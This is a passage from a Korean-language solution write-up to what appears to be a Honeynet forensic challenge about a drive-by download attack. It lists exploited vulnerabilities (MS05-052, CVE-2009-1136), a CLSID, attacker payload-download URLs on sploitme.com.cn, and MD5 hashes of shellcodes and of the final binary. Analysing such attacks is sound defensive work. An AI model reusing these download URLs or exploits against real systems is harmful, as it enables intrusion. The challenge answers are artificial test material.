최종 다운로드 파일 : http://sploitme.com.cn/fg/load.php?e=6

com()
MS05-052
CLSID : EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F
최종 다운로드 파일 : http://sploitme.com.cn/fg/load.php?e=7

spreadsheet()
CVE-2009-1136
최종 다운로드 파일 : http://sploitme.com.cn/fg/load.php?e=8

9. What actions does the shellcodes perform? Please list the shellcodes (+md5 of the binaries). What's the difference between them? (8pts)

쉘코드 파일이 전체 덤프에서 총 5개 있었으나 이중 정상적으로 동작하는 것은 2개로 MD5값은 아래와 같다.

#174 : e827460c0b6699922ac5a8e11fc3d3e2
#496 : b906014e9fcc31a849f97bebac475df5

10. Was there malware involved? What is the purpose of the malware(s)? (We are not looking for a detailed malware analysis for this challenge) (4pts)

우선 최종적으로 다운로드 하는 파일은 모두 같으며 MD5 값은 다음과 같다.
52312bb96ce72f230f0350e78873f791

해당 파일은 특별히 악의적인 증상은 없으며 실행하게 되면 http://www.honeynet.org/ URL로 접속하게 된다.